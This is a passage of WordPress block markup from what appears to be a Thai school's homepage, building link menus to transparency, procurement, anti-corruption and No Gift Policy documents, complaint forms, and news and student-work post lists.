{\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 